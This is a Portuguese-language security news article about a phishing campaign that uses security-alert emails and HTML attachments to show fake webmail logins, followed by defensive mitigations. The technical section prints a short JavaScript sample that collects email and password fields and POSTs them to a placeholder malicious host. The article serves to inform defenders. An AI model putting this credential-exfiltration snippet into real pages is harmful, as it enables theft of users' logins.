Uma campanha recente de phishing tem usado e-mails com tema de “alerta de segurança” para convencer vítimas a acessar páginas de webmail falsas que capturam credenciais; as mensagens frequentemente vêm aparentando o domínio da própria vítima e incluem anexos HTML com JavaScript embutido.
Descoberta e panorama
Relatada pelo Cyber Security News e com observações públicas de analistas Unit 42, a operação usa mensagens que simulam notificações de mensagens bloqueadas para induzir urgência e fazer com que o destinatário clique em um link ou abra um anexo. Um aspecto que aumenta a credibilidade das páginas de ataque é que o formulário de login falso costuma vir pré‑preenchido com o endereço de e‑mail da vítima.
Abordagem técnica — vetor e exploração
A campanha explora principalmente anexos HTML enviados por e‑mail que contêm JavaScript malicioso. Ao abrir o arquivo no navegador, scripts embutidos extraem os dados inseridos em um portal de webmail forjado e os enviam para servidores controlados pelos invasores. A cobertura inclui um trecho de código observado nas amostras:
let creds = { email: document.getElementById('email').value, pass: document.getElementById('pass').value };
fetch('https://malicious.site/collect', { method: 'POST', body: JSON.stringify(creds) });Esse padrão demonstra coleta direta de campos de formulário seguida de exfiltração via requisição POST para um domínio malicioso. As técnicas combinam engenharia social (urgência por mensagens bloqueadas) com execução client‑side de scripts em contexto de navegador.
Impacto e alcance
A matéria não fornece números públicos sobre quantas contas foram comprometidas ou quais setores foram visados. Unit 42 chamou a atenção para a eficácia do formato ao imitar avisos internos e pelo uso do pré‑preenchimento do e‑mail como artifício de confiança; trechos da observação do grupo resumem: "Security alert‑themed #phishing activity: emails appear to be sent from the recipient's own domain..." (Unit 42).
Mitigações práticas
- Bloquear ou isolar anexos HTML no gateway de e‑mail e tratar anexos HTML como potencialmente perigosos.
- Implementar autenticação multifator (MFA) em contas de e‑mail; mesmo com credenciais roubadas, MFA pode impedir acesso direto.
- Treinamento focalizado em engenharia social: alertas falsos sobre mensagens bloqueadas são um padrão observado na campanha.
- Analisar cabeçalhos de e‑mail para identificar falsificação de remetente e usar políticas de autenticação (SPF, DKIM, DMARC) rigorosas para reduzir spoofing.
Limites das informações
As fontes não detalham autores ou infraestrutura completa dos atacantes, nem quantificam vítimas. Também não há CVE ou indicador de comprometimento (IoC) listados na cobertura consultada; as únicas evidências técnicas públicas citadas são exemplos de amostras e o código de exfiltração.
Recomendações para equipes
Organizações devem revisar regras de filtragem de anexos, monitorar tráfego de saída para domínios desconhecidos e reforçar políticas de MFA e autenticação de e‑mail. Onde possível, realizar varredura de anexos HTML em sandbox e alertar usuários para o padrão observado: e‑mails que pedem liberação de mensagens e redirecionam para portais de login pré‑preenchidos.
Fontes: Cyber Security News; Unit 42